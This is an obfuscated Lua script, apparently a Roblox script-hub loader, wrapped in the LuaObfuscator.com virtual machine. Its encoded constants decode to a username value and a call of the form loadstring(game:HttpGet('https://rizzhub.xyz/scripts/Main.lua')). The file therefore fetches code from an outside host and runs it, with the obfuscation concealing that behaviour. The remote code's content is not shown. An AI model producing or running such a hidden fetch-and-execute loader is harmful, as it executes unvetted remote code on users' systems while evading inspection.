--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v73=v2(v0(v30,16));if v19 then local v77=0;local v78;while true do if (v77==0) then v78=v5(v73,v19);v19=nil;v77=1;end if (v77==1) then return v78;end end else return v73;end end end);local function v20(v31,v32,v33)if v33 then local v74=(v31/((226 -(82 + 142))^(v32-((1653 -(541 + 1111)) + 0))))%((1507 -(336 + 1169))^(((v33-(1790 -(95 + 1694))) -(v32-(2 -1))) + (3 -2))) ;return v74-(v74%(260 -((381 -(106 + 60)) + (1586 -(1018 + 524))))) ;else local v75=0 + 0 + 0 ;local v76;while true do if (v75==(1066 -(845 + 221))) then v76=2^(v32-1) ;return (((v31%(v76 + v76))>=v76) and (1785 -(144 + 1640))) or (0 -0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (682 -(399 + 27))) + v35 ;end local function v23()local v37=(658 -(20 + 23)) -(197 + 418) ;local v38;local v39;local v40;local v41;while true do if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 2 + 1 );v18=v18 + (1877 -(491 + 1382)) ;v37=589 -(194 + 12 + 382) ;end if (v37==(1 + 0)) then return (v41 * (45099427 -(28324199 -(1204 + 784)))) + (v40 * (14840 + 50696)) + (v39 * (1255 -(34 + 965))) + v38 ;end end end local function v24()local v42=v23();local v43=v23();local v44=(2 + 0) -1 ;local v45=(v20(v43,1307 -(139 + 1167) ,15 + 5 ) * (2^(239 -(57 + 50 + 100)))) + v42 ;local v46=v20(v43,142 -((43 -16) + 94) ,(2371 -1259) -(852 + 229) );local v47=((v20(v43,56 -24 )==(1224 -(878 + 345))) and  -(1 -0)) or (1 + 0) ;if (v46==(1000 -(990 + 1 + 9))) then if (v45==(1399 -(879 + 520))) then return v47 * 0 ;else local v79=0 -0 ;while true do if (v79==(1891 -((1243 -(519 + 321)) + 1488))) then v46=1 -(1947 -(1149 + 798)) ;v44=1230 -(894 + (1096 -760)) ;break;end end end elseif (v46==2047) then return ((v45==0) and (v47 * (1/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(2600 -(626 + 951)) ) * (v44 + (v45/((1 + 1)^(133 -81)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1549 -(184 + 1364)) );v18=v18 + v48 ;local v50={};for v64=2 -1 , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1307 -(381 + 926) ;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v66=0 + 0 ;while true do if (v66~=1) then else if (v51==(738 -(732 + 3))) then local v90=0;while true do if (v90~=(0 -0)) then else for v112=1234 -(325 + 908) ,v23() do v53[v112-(1 -0) ]=v28();end for v114=464 -(287 + 176) ,v23() do v54[v114]=v23();end v90=1;end if (v90==(894 -(680 + 213))) then return v55;end end end if (2==v51) then for v98=1 + 0 ,v56 do local v99=0;local v100;local v101;local v102;while true do if (v99==1) then v102=nil;while true do if (v100==(0 + 0)) then local v116=0 + 0 ;while true do if ((1 + 0)==v116) then v100=1 + 0 ;break;end if (v116==(0 + 0)) then local v119=0 + 0 ;while true do if (v119==(1 + 0)) then v116=2 -1 ;break;end if (v119==0) then v101=v21();v102=nil;v119=1;end end end end end if (v100==(307 -(285 + 21))) then if (v101==1) then v102=v21()~=0 ;elseif (v101==(2 + 0)) then v102=v24();elseif (v101==(14 -11)) then v102=v25();end v57[v98]=v102;break;end end break;end if ((0 + 0)~=v99) then else v100=144 -(103 + 41) ;v101=nil;v99=826 -(463 + 362) ;end end end v55[3]=v21();for v103=1 + 0 ,v23() do local v104=0;local v105;local v106;local v107;while true do if (v104==(689 -(598 + 91))) then v105=263 -(141 + 122) ;v106=nil;v104=1;end if (v104==(1642 -(1576 + 65))) then v107=nil;while true do if (v105==0) then v106=135 -(43 + 92) ;v107=nil;v105=1 -0 ;end if (v105==(1 + 0)) then while true do if (v106~=(54 -(13 + 41))) then else v107=v21();if (v20(v107,1 + 0 ,2 -1 )==(0 + 0)) then local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==(1744 -(828 + 914))) then while true do if (v121~=3) then else if (v20(v123,3,11 -8 )~=(1663 -(677 + 985))) then else v124[4 + 0 ]=v57[v124[10 -6 ]];end v52[v103]=v124;break;end if (v121==2) then local v148=0;while true do if (v148~=(1685 -(538 + 1147))) then else local v164=0 + 0 ;while true do if (v164==(1 + 0)) then v148=1;break;end if (v164~=(0 + 0)) then else if (v20(v123,1 + 0 ,1)~=(1 -0)) then else v124[573 -(339 + 232) ]=v57[v124[2]];end if (v20(v123,9 -7 ,2 + 0 )==(3 -2)) then v124[3]=v57[v124[1648 -(1127 + 518) ]];end v164=2 -1 ;end end end if (v148==(1547 -(915 + 631))) then v121=10 -7 ;break;end end end if (v121==(1309 -(311 + 997))) then local v149=0;while true do if (v149==(1 + 0)) then v121=132 -(124 + 6) ;break;end if (v149==(0 -0)) then v124={v22(),v22(),nil,nil};if (v122==0) then local v167=1874 -(782 + 1092) ;local v168;local v169;while true do if ((2 -1)==v167) then while true do if (v168~=(0 + 0)) then else v169=1548 -(532 + 1016) ;while true do if (v169~=(0 -0)) then else v124[1 + 2 ]=v22();v124[2 + 2 ]=v22();break;end end break;end end break;end if (v167==(0 -0)) then v168=0;v169=nil;v167=1 + 0 ;end end elseif (v122==(1 + 0)) then v124[3]=v23();elseif (v122==(2 -0)) then v124[2 + 1 ]=v23() -((2 + 0)^(1032 -(839 + 177))) ;elseif (v122~=(1 + 2)) then else local v184=1971 -(981 + 990) ;local v185;while true do if (v184~=(0 -0)) then else v185=0 + 0 ;while true do if (v185==(0 -0)) then v124[3 + 0 ]=v23() -((4 -2)^(10 + 6)) ;v124[4]=v22();break;end end break;end end end v149=1395 -(728 + 666) ;end end end if (v121~=(0 + 0)) then else local v150=0 -0 ;while true do if (v150==(2 -1)) then v121=1;break;end if (v150==(841 -(13 + 828))) then local v165=0;while true do if (v165~=(0 -0)) then else v122=v20(v107,554 -(521 + 31) ,7 -4 );v123=v20(v107,13 -9 ,1605 -(805 + 794) );v165=4 -3 ;end if (v165==(1463 -(1177 + 285))) then v150=1 + 0 ;break;end end end end end end break;end if (v120==(3 -2)) then v123=nil;v124=nil;v120=31 -(10 + 19) ;end if (v120==(0 + 0)) then v121=0 -0 ;v122=nil;v120=1511 -(1224 + 286) ;end end end break;end end break;end end break;end end end v51=3;end break;end if (v66~=(663 -(360 + 303))) then else if (v51~=0) then else local v92=0 -0 ;while true do if (v92==(4 -3)) then v54={};v51=1 + 0 ;break;end if (v92==(0 + 0)) then v52={};v53={};v92=1;end end end if (v51==(657 -(29 + 627))) then v55={v52,v53,nil,v54};v56=v23();v57={};v51=1845 -(330 + 1513) ;end v66=1;end end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v67=0;local v68;local v69;local v70;local v71;local v72;while true do if (v67==0) then v68=1;v69= -1;v67=1;end if (v67==1) then v70={...};v71=v12("#",...) -1 ;v67=2;end if (v67==3) then A,B=v27(v11(v72));if  not A[1] then local v93=v58[4][v68] or "?" ;error("Script error at ["   .. v93   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v67==2) then v72=nil;function v72()local v80=v61;local v81=v62;local v82=v63;local v83=v27;local v84={};local v85={};local v86={};for v94=0 + 0 ,v71 do if ((v94>=v82) or ((2798 -1983)>=(3546 + 627))) then v84[v94-v82 ]=v70[v94 + (321 -(245 + 75)) ];else v86[v94]=v70[v94 + 1 ];end end local v87=(v71-v82) + (1 -0) ;local v88;local v89;while true do local v95=0 -0 ;local v96;local v97;while true do if ((v95==1) or ((5484 -(990 + 456))<=1719)) then while true do if ((v96==(540 -(195 + 345))) or ((3217 + 1538)==1906)) then v97=0 -(1400 -(242 + 1158)) ;while true do if ((v97==(1679 -(105 + 1574))) or ((1256 -(646 + 259 + 307))>(3137 + 318))) then local v118=471 -(338 + 133) ;while true do if ((v118==(1089 -(257 + 831))) or (2374>=((1370 + 13692) -10959))) then v97=2 -(1 + 0) ;break;end if (((0 + (1781 -(1580 + 201)))==v118) or ((6416 -3871)>=(8546 -4226))) then local v125=0;while true do if (((0 + (0 -0))==v125) or ((2074 + 1351)<=(3512 -1917))) then v88=v80[v68];v89=v88[1 + 0 ];v125=2 -1 ;end if ((v125==((1799 -(92 + 1706)) -0)) or ((4072 + 300)==(155 + 1664))) then v118=483 -(227 + 255) ;break;end end end end end if ((v97==(2 -1)) or ((4402 -(95 + 174))<(1931 + 687))) then if ((v89<=(1 + 4)) or ((833 + (2892 -1836))==(2302 + 1943))) then if (((706 -410)==(32 + 264)) and (v89<=(4 -2))) then if ((v89<=((1742 -(76 + 10)) -(1130 + 526))) or ((5933 -(69 + 1781))>=(7527 -2537))) then local v128=748 -(702 + (132 -86)) ;local v129;while true do if ((v128==(754 -(667 + (161 -74)))) or ((1953 + 2800)<(4055 -(816 + 1091)))) then v129=v88[2];v86[v129]=v86[v129](v13(v86,v129 + (2 -1) ,v69));break;end end elseif ((v89>(577 -(451 + 125))) or ((1874 -1247)>(1981 -(435 + 199)))) then v68=v88[803 -(17 + 783) ];else v86[v88[1447 -(1198 + (717 -470)) ]]=v88[3 + 0 ]~=((0 -0) -0) ;end elseif (((3359 -(883 + 444))<=(8630 -4729)) and (v89<=3)) then local v130=0 + 0 ;local v131;local v132;local v133;local v134;while true do if (((9762 -7249)<=(16554 -11790)) and (v130==((3191 -(299 + 1232)) -((1996 -(212 + 358)) + 233)))) then local v153=0 + 0 ;while true do if (((0 + 0)==v153) or ((2174 -939)>1572)) then v69=(v133 + v131) -(1 -0) ;v134=68 -(31 + 37) ;v153=681 -(539 + 141) ;end if (((12 + 671)<=((8658 -(1313 + 587)) -(736 + 1130))) and (v153==((357 -(183 + 173)) + 0))) then v130=5 -3 ;break;end end end if ((v130==(7 -5)) or ((857 -385)>(3109 -1729))) then for v157=v131,v69 do local v158=0 + 0 ;local v159;while true do if (((3213 -2022)<((4880 -(1349 + 360)) + 1050)) and (v158==(0 + 0))) then v159=0 -0 ;while true do if (((275 + 3877)==(4786 -(303 + 331))) and ((0 + 0)==v159)) then v134=v134 + (183 -(79 + 103)) ;v86[v157]=v132[v134];break;end end break;end end end break;end if ((v130==(0 -0)) or ((4790 -(858 + 605))<(4009 -2652))) then local v154=0 -0 ;while true do if ((v154==(2 -1)) or ((2 + 0 + 2)>(7814 -5421))) then v130=1 + 0 ;break;end if ((v154==(0 + 0 + 0)) or ((9893 -5467)<(524 + 1021))) then v131=v88[2 -(1469 -(453 + 1016)) ];v132,v133=v83(v86[v131](v13(v86,v131 + (2 -(1 + 0)) ,v88[12 -9 ])));v154=1476 -(119 + 1356) ;end end end end elseif ((((1812 -1000) + 1453)==((375 + 7330) -5440)) and (v89==(11 -7))) then if (((2441 -1131)>(790 -398)) and (v86[v88[2 + 0 ]]==v88[15 -11 ])) then v68=v68 + 1 + 0 ;else v68=v88[7 -4 ];end else v86[v88[1 + 1 ]]();end elseif (((3251 -(529 + 133))>(2937 -(1390 + 257))) and (v89<=(2 + 6))) then if ((v89<=(1470 -(434 + 1030))) or ((3590 -(519 + 565))<(1500 -(953 + (1024 -(145 + 403)))))) then v60[v88[8 -5 ]]=v86[v88[2]];elseif ((v89>(4 + 3)) or ((18430 -13538)<(13343 -9928))) then v86[v88[5 -3 ]]=v60[v88[8 -(14 -9) ]];else do return;end end elseif (((160 + 3558)==(2098 + 1620)) and (v89<=(1898 -(1109 + 138 + 641)))) then if ((v89>(23 -14)) or ((12574 -8578)>=(10823 -(12690 -6409)))) then if (((1792 -(164 + 586 + 927))<(12335 -8562)) and (v88[4 -2 ]==v86[v88[(38 -(34 + 3)) + 3 ]])) then v68=v68 + 1 + 0 ;else v68=v88[637 -(299 + 335) ];end else v86[v88[(2554 -963) -(50 + 1539) ]]=v88[(2 + 8) -(26 -19) ];end elseif ((v89>(5 + (154 -(13 + 135)))) or ((6684 -(134 + 1727))<(2414 -1517))) then for v155=v88[2 + 0 ],v88[541 -((496 -(92 + 272)) + 406) ] do v86[v155]=nil;end else local v143=0 -0 ;local v144;local v145;local v146;while true do if ((v143==(1832 -(432 + 1399))) or ((2429 -(1429 + 160))>=4020)) then v146=nil;while true do if ((((30346 -16771) -10762)<=(3566 -(121 + 522))) and (v144==((2791 -1325) -(148 + 822 + 495)))) then v86[v145 + 1 + 0 ]=v146;v86[v145]=v146[v88[1551 -(458 + (1340 -(136 + 115))) ]];break;end if ((v144==(0 -0)) or ((884 + 4007)<(1802 -1375))) then local v173=708 -(641 + 67) ;while true do if (((0 + 0)==v173) or ((1413 + 3148)<=(796 + 821))) then v145=v88[1408 -(503 + 903) ];v146=v86[v88[5 -2 ]];v173=1 + 0 ;end if ((v173==(2 -1)) or ((2043 -(1042 + (1063 -579)))<=(93 + 18))) then v144=1 + 0 ;break;end end end end break;end if (((2882 -(1542 + 402))<=(12122 -8325)) and (((1225 -(973 + 252)) -0)==v143)) then v144=1888 -(219 + 229 + 1440) ;v145=nil;v143=1 + 0 ;end end end v68=v68 + 1 ;break;end end break;end end break;end if ((v95==((0 -0) -0)) or ((4676 -(352 + 510))<=(1400 + (2200 -1604)))) then v96=0 + 0 ;v97=nil;v95=1194 -(692 + 501) ;end end end end v67=3;end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365724E616D6503123O00766963746F726368616E5F6F66696369616C030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756100163O0012093O00014O000C000100013O000E0A0001000200013O0004023O00020001001209000100013O00260400010005000100010004023O00050001001209000200033O001206000200023O001208000200043O001208000300053O00200B000300030006001209000500074O0001000600014O0003000300066O00023O00022O00050002000100010004023O001500010004023O000500010004023O001500010004023O000200012O00073O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
